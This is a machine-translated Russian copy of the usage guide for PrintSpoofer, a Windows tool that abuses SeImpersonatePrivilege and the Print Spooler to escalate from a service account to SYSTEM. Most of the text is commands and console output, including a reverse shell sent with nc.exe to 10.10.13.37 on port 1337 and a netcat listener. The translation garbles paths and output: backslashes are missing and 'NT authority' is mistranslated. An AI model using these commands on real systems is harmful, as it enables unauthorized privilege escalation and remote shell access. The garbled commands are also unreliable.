От ЛОКАЛЬНОЙ/СЕТЕВОЙ СЕРВИСА к СИСТЕМЕ путем злоупотребления SeImpersonatePrivilege
в Windows 10 и Server 2016/2019.
Вы можете просмотреть справочное сообщение, используя опцию -h
.
C:ИНСТРУМЕНТЫ>PrintSpoofer.exe -h PrintSpoofer v0.1 (от @itm4n) При условии, что текущий пользователь имеет привилегию SeImpersonate, этот инструмент будет использовать функцию печати. Служба спулера для получения системного токена и последующего запуска специальной команды с помощью CreateProcessAsUser(). Аргументы: -cВыполнить команду *CMD* -i Взаимодействовать с новым процессом в текущей командной строке (по умолчанию неинтерактивно) -d Создать новый процесс на рабочем столе, соответствующий этому сеансу *ID* (проверьте свой идентификатор с помощью qwinsta) -х Это я :) Примеры: - Запустите PowerShell как СИСТЕМУ в текущей консоли. PrintSpoofer.exe -i -c powershell.exe - Создать командную строку СИСТЕМЫ на рабочем столе сеанса 1. PrintSpoofer.exe -d 1 -c cmd.exe - Получите обратную оболочку СИСТЕМЫ PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
Если у вас есть интерактивная оболочка, вы можете создать новый СИСТЕМНЫЙ процесс в текущей консоли.
Вариант использования : привязка оболочки, обратная оболочка, psexec.py
и т. д.
C:TOOLS>PrintSpoofer.exe -i -c cmd [+] Найдена привилегия: SeImpersonatePrivilege [+] Прослушивание именованного канала... [+] CreateProcessAsUser() ОК Microsoft Windows [версия 10.0.19613.1000] (c) Корпорация Microsoft, 2020 г. Все права защищены. C: WINDOWSsystem32> whoami NT авторитетная система
Если вы можете выполнять команды , но у вас нет интерактивной оболочки, вы можете создать новый СИСТЕМНЫЙ процесс и немедленно выйти, не взаимодействуя с ним.
Вариант использования : WinRM, WebShell, wmiexec.py
, smbexec.py
и т. д.
Создайте обратную оболочку:
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] Найдена привилегия: SeImpersonatePrivilege [+] Прослушивание именованного канала... [+] CreateProcessAsUser() ОК
Слушатель Netcat:
C:TOOLS>nc.exe -l -p 1337 Microsoft Windows [версия 10.0.19613.1000] (c) Корпорация Microsoft, 2020 г. Все права защищены. C: WINDOWSsystem32> whoami NT авторитетная система
Если вы вошли в систему локально или через RDP (включая VDI), вы можете вызвать системную командную строку на своем рабочем столе. Сначала проверьте идентификатор сеанса с помощью команды qwinsta
, а затем укажите это значение с помощью опции -d
.
Вариант использования : сеанс терминала (RDP), VDI.
C:ИНСТРУМЕНТЫ>qwinsta ИМЯ СЕССИИ ИМЯ ПОЛЬЗОВАТЕЛЯ ID СОСТОЯНИЕ ТИП УСТРОЙСТВА услуги 0 Диск консоль Администратор 1 Активен >rdp-tcp#3 лабораторный пользователь 3 активен rdp-tcp 65536 Слушать C:TOOLS>PrintSpoofer.exe -d 3 -c «обход powershell -ep» [+] Найдена привилегия: SeImpersonatePrivilege [+] Прослушивание именованного канала... [+] CreateProcessAsUser() ОК